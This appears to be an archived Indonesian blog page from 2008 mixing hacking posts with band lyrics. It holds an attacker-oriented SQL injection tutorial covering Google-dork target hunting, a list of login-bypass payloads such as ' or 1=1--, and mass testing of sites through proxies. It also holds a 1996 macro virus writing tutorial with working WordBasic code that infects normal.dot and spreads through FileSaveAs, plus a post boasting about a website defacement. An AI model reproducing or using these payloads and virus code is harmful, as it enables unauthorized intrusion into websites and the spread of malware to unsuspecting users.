ziddu

Sabtu, 13 Desember 2008

SQL injection Basic Tutorial


One of the major problems with SQL is its poor security issues surrounding is the login and url strings.
this tutorial is not going to go into detail on why these string work as am not a coder i just know what i know and it works
SEARCH:
admin\login.asp
login.asp
with these two search string you will have plenty of targets to chose from...finding one thats vulnerable is another question.
WHAT I DO :
first let me go into details on how i go about my research
i have gathered plenty of injection strings for quite some time like these below and have just been granted access to a test machine and will be testing for many variations and new inputs...legally cool...provided by my good friend Gsecur aka ICE..also an Astal member..http://governmentsecurity.org/

"thanks mate" .. gives me a chance to concentrate on what am doing and not be looking over my shoulder

INJECTION STRINGS:HOW ?

this is the easiest part...very simple

on the login page just enter something like

user:admin (you dont even have to put this.)
pass:' or 1=1--

or

user:' or 1=1--
admin:' or 1=1--

some sites will have just a password so

password:' or 1=1--

infact i have compiled a combo list with strings like this to use on my chosen targets ....there are plenty of strings about , the list below is a sample of the most common used

there are many other strings involving for instance UNION table access via reading the error pages table structure
thus an attack with this method will reveal eventually admin U\P paths...but thats another paper

the one am interested in are quick access to targets

PROGRAM
i tried several programs to use with these search strings and upto now only Ares has peformed well with quite a bit
of success with a combo list formatted this way,yesteday i loaded 40 eastern targets with 18 positive hits in a few minutes
how long would it take to go thought 40 sites cutting and pasting each string ??

combo example:

admin:' or a=a--
admin:' or 1=1--

and so on...it dont have to be admin can be anything you want... the most important part is example:' or 1=1-- this is our injection
string

now the only trudge part is finding targets to exploit...so i tend to search say google for login.asp or whatever

inurl:login.asp
index of:/admin/login.asp

like this: index of login.asp

result: http://www3.google.com/search?hl=en&ie=ISO...G=Google+Search
17,000 possible targets trying various searches spews out plent more


now using proxys set in my browser i then click through interesting targets...seeing whats what on the site pages if interesting
i then cut and paste url as a possible target...after an hour or so you have a list of sites of potential targets like so

http://www.somesite.com/login.asp
http://www.another.com/admin/login.asp

and so on...in a couple of hours you can build up quite a list...reason i dont sellect all results or spider for login pages is
i want to keep the noise level low...my ISP.. well enough said...plus atm am on dial-up so to slow for me

i then save the list fire up Ares and enter (1) a proxy list (2)my target IP list (3)my combo list...start..now i dont want to go into
problems with users using Ares..thing is i know it works for me...

sit back and wait...any target vulnerable with show up in the hits box...now when it finds a target it will spew all the strings on that site as vulnerable...you have to go through each one on the site by cutting and pasting the string till you find the right one..but the thing is you know you CAN access the site ...really i need a program that will return the hit with a click on url and ignore false outputs

am still looking....thing is it saves quite a bit of time going to each site and each string to find its not exploitable.

there you go you should have access to your vulnerable target by now

another thing you can use the strings in the urls were user=? edit the url to the = part and paste ' or 1=1-- so it becomes

user=' or 1=1-- just as quick as login process


(Variations)

admin'--

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

hi' or 'a'='a

hi') or ('a'='a

hi") or ("a"="a

happy hunting .. :P~

http://comsec.governmentsecurity.org

*******************************************


thanks to : milwOrm






[+/-] Selengkapnya...

Kamis, 11 Desember 2008

Rapidshare Speed Download!! no waiting F *CK !


If you are not a member premium,Download from here.
but you can't download a big size
example: size of file 100 MB
more link: http://ultragen.info/index.php

[+/-] Selengkapnya...

A Skylit Drive Biography



A Skylit Drive is a six-piece post-hardcore band from Lodi/Galt California. They released their first EP, titled “She Watched the Sky” with Tragic Hero Records in January and have released the follow-up full length album “Wires and the Concept of Breathing”. ASD is Michael “Jag” Jagmin (Vocals), Nick Miller (Guitar), Joey Wilson (Guitar), Brian White (Bass/Vocals), Kyle Simmons (Synthesis/Keys), and Cory La Quay (Drums/Vocals).

[+/-] Selengkapnya...

Lyric - Hey Nightmare, Where Did You Get Them Teeth


Hey Nightmare, Where Did You Get Them Teeth
Artist: A Skylit Drive


Run, for your life now.
dont you see your princess is gone?
pull your vengeance to side, lets make it rain blood tonight

collide your sword with mine.
ill send your soul
to the hell
where it came from
by this I know
youll never set your eyes
on a quest you cant survive
its no surprise
your head hangs from my hands
your mouth cant sin nor lie

cut through the limbs
stab through the enemies eyes
any last man will die

shes watching the burn
oh how burns,
run for the skylines
run for the skylines darling
follow the light of the moon
just stay alive.

forgive me
for tomorrow
if im late
ill die before I wake

cut through the limbs
stab through the enemies eyes
any last man will die

whats left for you?
you
you wanted love
I showed you
life.
conserve, protect your life
conserve your life
conserve, protect your life
conserve your life

your life is my well being and if it lay in the shadows then so be. but let it be known that this soldier will not rest a day, 'til he lays in the glamour and the the grace of his bride. I will not rest one day until my victims blood is shed up and down the shores lines.

up and down the shore lines

for God's sake please dont you forget me
I will wait for you.for Gods sake please dont
you forget I will wait for you, for you

Download Song

[+/-] Selengkapnya...

The macro virus writing tutorial { part 1 }

Legalese

I shall not be held responsible for any damage created be direct or indirect use of the publicised material. This document is copyright 1996 to me, Dark Night of VBB. Herewith I grant anybody license to redistribute this document as long as it is kept in whole and my copyright notice is not removed. Also if I find any lamers who just take the code published here and say it is their own I will see that they'll be punished. (Believe it or not :-))!!!

Introduction

Many of you may be wondering right now who the hell I am and who VBB is. Come on lamers! Get alive. VBB is one of the coolest virus groups around. You can't tell me you've never heard of us. Well, Ok I'll admit it. We're not that popular yet, but that'll come. So for now here's my contribution to the group as the leader. Welcome to the macro virus writing tutorial part 1.

Enjoy!!

The tools

First of all you'll need MS Word 6.0 or up (duh), then you may want to get VBB's macro disassembler by Aurodreph so that you can study encrypted macros. Also you should make back-ups of your normal. DOT template in your WINWORD6\TEMPLATE\ directory, as this is the document commonly infected by macro virii. So whatch out. Also I recommend to have at least a small knowledge of word basic, so that you kind a know what's going on. Well, that's it. You've made it this far. It's now time to get into the macro virus generals.

The general stuff

Most macro virii have a pretty set structure. They start of with an auto-executing macro which infects the normal.dot(global) template. Then they have some macros which will infect the files on certain actions. For example FileSaveAs, FileSave, FileOpen, ToolsMacros. Documents are infected through transferring the macros into the document and having them execute the next time the document is opened. A code for the autoexec routine would look something like this:

'ANYTHING AFTER THE ' ARE MY COMMENTS

Sub MAIN
On Error Goto Abort
iMacroCount = CountMacros(0, 0)
'CHECK TO SEE IF INFECTION EXISTS
For i = 1 To iMacroCount
If MacroName$(i, 0, 0) = "PayLoad" Then
bInstalled = - 1
'BY LOOKING FOT THE PAYLOAD MACRO
End If
If MacroName$(i, 0, 0) = "FileSaveAs" Then
bTooMuchTrouble = - 1
'BUT IF THE FILESAVEAS MACRO EXISTS THEN INFECTION IS
'TOO DIFICULT.
End If
Next i
If Not bInstalled And Not bTooMuchTrouble Then
'add FileSaveAs and copies of AutoExec and FileSaveAs.
'Payload has no use except to check for infection.
'The ,1 encrypts all macros in their destination making
'them unreadble in Word.
iWW6IInstance = Val(GetDocumentVar$("WW6Infector"))
sMe$ = FileName$()
Macro$ = sMe$ + ":PayLoad"
MacroCopy Macro$, "Global:PayLoad", 1
Macro$ = sMe$ + ":FileOpen"
MacroCopy Macro$, "Global:FileOpen", 1
Macro$ = sMe$ + ":FileSaveAs"
MacroCopy Macro$, "Global:FileSaveAs", 1
Macro$ = sMe$ + ":AutoExec"
MacroCopy Macro$, "Global:AutoExec", 1
SetProfileString "WW6I", Str$(iWW6IInstance + 1)
End If
Abort:
End Sub

The SaveAs routine

This is the routine which copies the macro virus into the active document when it is saved using File/Save As. It uses much of the same techniques as the AutoExec routine. Here's what the code should look like for the SaveAs routine:

'YOU CAN ALWAYS USE THE ,1 AGAIN TO ENCRYPT MACROS.

Sub MAIN
Dim dlg As FileSaveAs
GetCurValues dlg
Dialog dlg
If (Dlg.Format = 0) Or (dlg.Format = 1) Then
MacroCopy "FileSaveAs", WindowName$() + ":FileSaveAs"
MacroCopy "FileSave ", WindowName$() + ":FileSave"
MacroCopy "PayLoad", WindowName$() + ":PayLoad"
MacroCopy "FileOpen", WindowName$() + ":FileOpen"
Dlg.Format = 1
End If
FileDaveAs dlg
End Sub



Short, but it works well. All this info, believe it or not, is enough to make a small and basic macro virus.

Happy trying..!! :)

credit: netlux.org

[+/-] Selengkapnya...

Senin, 08 Desember 2008

Deface Today !!

Iseng karna udah lama gak deface²an,gw cobain mampir ke um guggle dan nemu korban..

Bugs nya cari sendiri yah...!! Xixixixi ...

[+/-] Selengkapnya...

© Pimped: Andrea Adelheid